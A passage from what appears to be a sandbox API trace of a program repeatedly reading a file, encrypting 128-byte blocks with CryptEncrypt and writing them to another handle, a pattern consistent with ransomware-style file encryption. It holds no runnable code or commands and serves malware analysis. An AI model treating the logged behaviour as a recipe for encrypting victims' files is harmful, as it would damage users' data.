lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.650] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.650] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.650] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.650] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.650] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.650] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.650] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.650] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.650] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.650] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.650] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.650] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.650] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.650] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.650] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.650] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.650] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.650] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.651] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.651] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.651] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.651] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.651] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.651] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.651] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.651] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.651] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.651] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.651] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.651] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.651] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.664] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.664] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.664] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.664] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.664] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.664] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.664] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.664] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.664] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.664] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.664] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.665] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.665] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.665] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.665] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.665] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.665] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.665] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.665] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.665] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.665] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.665] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.665] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.665] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.665] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.665] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.665] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.665] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.665] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.665] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.666] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.666] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.666] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.666] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.666] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.666] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.666] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.666] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.666] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.666] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.666] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.666] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.666] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.666] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.666] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.666] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.666] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.666] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.666] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.667] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.667] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.667] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.667] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.667] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.667] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.667] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.667] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.667] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.667] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.667] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.667] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.667] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.667] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.667] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.667] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.667] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.667] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.667] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.667] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.667] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.668] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.668] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0119.668] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0119.668] WriteFile (in: hFile=0x344, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0119.668] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, 